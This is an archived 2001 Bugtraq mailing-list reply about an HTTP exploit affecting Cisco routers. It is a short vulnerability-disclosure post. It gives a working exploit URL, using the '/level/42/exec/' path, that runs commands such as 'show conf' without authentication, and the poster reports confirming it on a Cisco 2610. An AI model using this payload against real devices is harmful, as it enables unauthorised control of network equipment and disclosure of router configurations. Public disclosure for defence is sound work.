Bugtraq mailing list archives
Re: Cisco device HTTP exploit...
From: Grzegorz Krawczyk <krawiec () saturn expro pl>
Date: Tue, 3 Jul 2001 09:14:06 +0200 (CEST)
A malicious user could use: http://169.254.0.15/level/42/exec/show%20conf
I've tested it on CISCO 2610 router with IOS (tm) C2600 Software (C2600-I-M), Version 12.0(10), RELEASE SOFTWARE (fc1) It work.. You can exec any command.. Krawiec
Current thread:
- Cisco device HTTP exploit... Half Adder (Jul 02)
- Re: Cisco device HTTP exploit... Marc-Adrian Napoli (Jul 03)
- Re: Cisco device HTTP exploit... Damir Rajnovic (Jul 04)
- Re: Cisco device HTTP exploit... Grzegorz Krawczyk (Jul 03)
- <Possible follow-ups>
- RE: Cisco device HTTP exploit... Thornton, Simon (Simon)** CTR ** (Jul 05)
- Re: Cisco device HTTP exploit... Marc-Adrian Napoli (Jul 03)